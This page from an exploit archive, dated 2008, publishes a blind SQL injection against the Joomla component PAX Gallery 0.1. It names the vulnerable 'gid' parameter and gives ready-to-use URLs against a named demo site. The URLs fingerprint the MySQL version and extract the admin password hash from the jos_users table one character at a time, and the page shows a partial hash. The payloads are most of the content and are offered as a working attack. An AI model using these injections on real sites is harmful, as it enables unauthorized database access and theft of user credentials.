[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component PAX Gallery 0.1 Blind SQL Injection Vulnerability
# Published : 2008-12-28
# Author : XaDoS
# Previous Title : Miniweb 2.0 (Auth Bypass) SQL Injection Vulnerability
# Next Title : DeluxeBB <= 1.2 Remote Blind SQL Injection Exploit


[a–?]  Joomla Component PAX Gallery v 0.1 (gid) <= Blind SQL Injection Vulnerability
 
>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B?§g: Blind $ql inJection
> Note: safe mode = ON
> Autor script: Tobias Floery
>---------------------------------------<
 

[a–?] ExPL0iT:


|: http://www.example.com/path/com_paxgallery&task=table&gid=[$qL] 


[a–?] D?£M0: 

>Version:

|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=5  [Ye$]
 
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=4 [Noo]
 
 
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20ascii(substring((select%20password%20from%20jos_users%20limit%201,1),1,1))%3E100
 
d8e423..ecc... ;-)
 
[a–?] Th4nKs::
 
> Str0ke </ > Securitycode Team </ > StaKer </

# www.Syue.com [2008-12-28]